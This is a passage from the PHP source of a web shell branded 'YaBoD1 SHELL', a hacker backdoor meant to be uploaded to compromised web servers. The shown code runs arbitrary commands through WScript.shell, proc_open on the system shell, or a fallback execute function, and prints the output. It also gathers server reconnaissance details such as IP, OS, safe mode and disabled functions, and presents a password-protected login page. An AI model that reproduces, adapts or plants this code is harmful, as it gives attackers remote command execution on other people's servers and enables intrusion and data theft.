1518 if ($execfunc=='wscript' && IS_WIN && IS_COM) {
1519 $wsh = new COM('WScript.shell');
1520 $exec = $wsh->exec('cmd.exe /c '.$command);
1521 $stdout = $exec->StdOut();
1522 $stroutput = $stdout->ReadAll();
1523 echo $stroutput;
1524 } elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
1525 $descriptorspec = array(
1526 0 => array('pipe', 'r'),
1527 1 => array('pipe', 'w'),
1528 2 => array('pipe', 'w')
1529 );
1530 $process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
1531 if (is_resource($process)) {
1532 fwrite($pipes[0], $command."\r\n");
1533 fwrite($pipes[0], "exit\r\n");
1534 fclose($pipes[0]);
1535 while (!feof($pipes[1])) {
1536 echo fgets($pipes[1], 1024);
1537 }
1538 fclose($pipes[1]);
1539 while (!feof($pipes[2])) {
1540 echo fgets($pipes[2], 1024);
1541 }
1542 fclose($pipes[2]);
1543 proc_close($process);
1544 }
1545 } else {
1546 echo(execute($command));
1547 }
1548 p('</pre>');
1549 }
1550}//end shell
1551
1552elseif ($action == 'phpenv') {
1553 $upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
1554 $adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
1555 !$dis_func && $dis_func = 'No';
1556 $info = array(
1557 1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)),
1558 2 => array('Server Domain',$_SERVER['SERVER_NAME']),
1559 3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])),
1560 4 => array('Server OS',PHP_OS),
1561 5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
1562 6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']),
1563 7 => array('Server Web Port',$_SERVER['SERVER_PORT']),
1564 8 => array('PHP run mode',strtoupper(php_sapi_name())),
1565 9 => array('The file path',__FILE__),
1566
1567 10 => array('PHP Version',PHP_VERSION),
1568 11 => array('PHPINFO',(IS_PHPINFO ? '<a href="javascript:goaction(\'phpinfo\');">Yes</a>' : 'No')),
1569 12 => array('Safe Mode',getcfg('safe_mode')),
1570 13 => array('Administrator',$adminmail),
1571 14 => array('allow_url_fopen',getcfg('allow_url_fopen')),
1572 15 => array('enable_dl',getcfg('enable_dl')),
1573 16 => array('display_errors',getcfg('display_errors')),
1574 17 => array('register_globals',getcfg('register_globals')),
1575 18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),
1576 19 => array('memory_limit',getcfg('memory_limit')),
1577 20 => array('post_max_size',getcfg('post_max_size')),
1578 21 => array('upload_max_filesize',$upsize),
1579 22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'),
1580 23 => array('disable_functions',$dis_func),
1581 );
1582
1583 if($phpvarname) {
1584 m($phpvarname .' : '.getcfg($phpvarname));
1585 }
1586
1587 formhead(array('title'=>'Server environment'));
1588 makehide('action','phpenv');
1589 makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1));
1590 formfooter();
1591
1592 $hp = array(0=> 'Server', 1=> 'PHP');
1593 for($a=0;$a<2;$a++) {
1594 p('<h2>'.$hp[$a].' »</h2>');
1595 p('<ul class="info">');
1596 if ($a==0) {
1597 for($i=1;$i<=9;$i++) {
1598 p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
1599 }
1600 } elseif ($a == 1) {
1601 for($i=10;$i<=23;$i++) {
1602 p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
1603 }
1604 }
1605 p('</ul>');
1606 }
1607}//end phpenv
1608
1609else {
1610 m('Undefined Action');
1611}
1612
1613?>
1614</td></tr></table>
1615<div style="padding:10px;border-bottom:1px solid #0E0E0E;border-top:1px solid #0E0E0E;background:#0E0E0E;">
1616 <span style="float:right;"><?php debuginfo();ob_end_flush();?></span>
1617 Copyright (C) 2010-2011 <B>[S4T]</B> - Develop by <a href=b4@live.fr target=_blank><B>YaBoD1</B></a> - <B>YaBoD1.COM</B> All Rights Reserved.
1618</div>
1619</body>
1620</html>
1621
1622<?php
1623
1624/*======================================================
1625Show info shell
1626======================================================*/
1627
1628function m($msg) {
1629 echo '<div style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;">';
1630 echo $msg;
1631 echo '</div>';
1632}
1633function scookie($key, $value, $life = 0, $prefix = 1) {
1634 global $admin, $timestamp, $_SERVER;
1635 $key = ($prefix ? $admin['cookiepre'] : '').$key;
1636 $life = $life ? $life : $admin['cookielife'];
1637 $useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
1638 setcookie($key, $value, $timestamp+$life, $admin['cookiepath'], $admin['cookiedomain'], $useport);
1639}
1640function multi($num, $perpage, $curpage, $tablename) {
1641 $multipage = '';
1642 if($num > $perpage) {
1643 $page = 10;
1644 $offset = 5;
1645 $pages = @ceil($num / $perpage);
1646 if($page > $pages) {
1647 $from = 1;
1648 $to = $pages;
1649 } else {
1650 $from = $curpage - $offset;
1651 $to = $curpage + $page - $offset - 1;
1652 if($from < 1) {
1653 $to = $curpage + 1 - $from;
1654 $from = 1;
1655 if(($to - $from) < $page && ($to - $from) < $pages) {
1656 $to = $page;
1657 }
1658 } elseif($to > $pages) {
1659 $from = $curpage - $pages + $to;
1660 $to = $pages;
1661 if(($to - $from) < $page && ($to - $from) < $pages) {
1662 $from = $pages - $page + 1;
1663 }
1664 }
1665 }
1666 $multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\''.$tablename.'\', \'\', 1);">First</a> ' : '').($curpage > 1 ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage - 1).');">Prev</a> ' : '');
1667 for($i = $from; $i <= $to; $i++) {
1668 $multipage .= $i == $curpage ? $i.' ' : '<a href="javascript:settable(\''.$tablename.'\', \'\', '.$i.');">['.$i.']</a> ';
1669 }
1670 $multipage .= ($curpage < $pages ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage + 1).');">Next</a>' : '').($to < $pages ? ' <a href="javascript:settable(\''.$tablename.'\', \'\', '.$pages.');">Last</a>' : '');
1671 $multipage = $multipage ? '<p>Pages: '.$multipage.'</p>' : '';
1672 }
1673 return $multipage;
1674}
1675// Login page
1676function loginpage() {
1677?>
1678<html>
1679<head>
1680
1681<body bgcolor=black background=http://i382.photobucket.com/albums/oo263/vnhacker/bg-1.jpg>
1682
1683 <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
1684<title>yabod1 SHELL - Develop by yabod1</title>
1685<style type="text/css">
1686A:link {text-decoration: none; color: green }
1687A:visited {text-decoration: none;color:red}
1688A:active {text-decoration: none}
1689A:hover {text-decoration: underline; color: green;}
1690input, textarea, button
1691{
1692 font-size: 9pt;
1693 color: #ccc;
1694 font-family: verdana, sans-serif;
1695 background-color: #202020;
1696 border-left: 1px solid #74A202;
1697 border-top: 1px solid #74A202;
1698 border-right: 1px solid #74A202;
1699 border-bottom: 1px solid #74A202;
1700}
1701
1702</style>
1703
1704 <BR><BR>
1705<div align=center >
1706<fieldset style="border: 1px solid rgb(69, 69, 69); padding: 4px;width:450px;bgcolor:white;align:center;font-family:tahoma;font-size:10pt"><legend><font color=red><B>Login</b></font></legend>
1707
1708<div>
1709<font color=gray>
1710<font color=yellow>==[ <B>YaBoD1 SHELL</B> ]== </font><BR><BR>
1711
1712<form method="POST" action="">
1713 <span style="font:10pt tahoma;">Password: </span><input name="password" type="password" size="20">
1714 <input type="hidden" name="doing" value="login">
1715 <input type="submit" value="Login">
1716 </form>
1717<BR>
1718<?php
1719echo "".$err_mess."";
1720?>
1721
1722 <B><font color=red>
1723<a href=http://www.yabod1.com target=_blank>YaBod1 sniper algeria</a><BR></b>
1724
1725
1726
1727
1728
1729</div>
1730
1731
1732 </fieldset>
1733
1734
1735
1736</head>
1737</html>
1738<?php
1739}
1740?>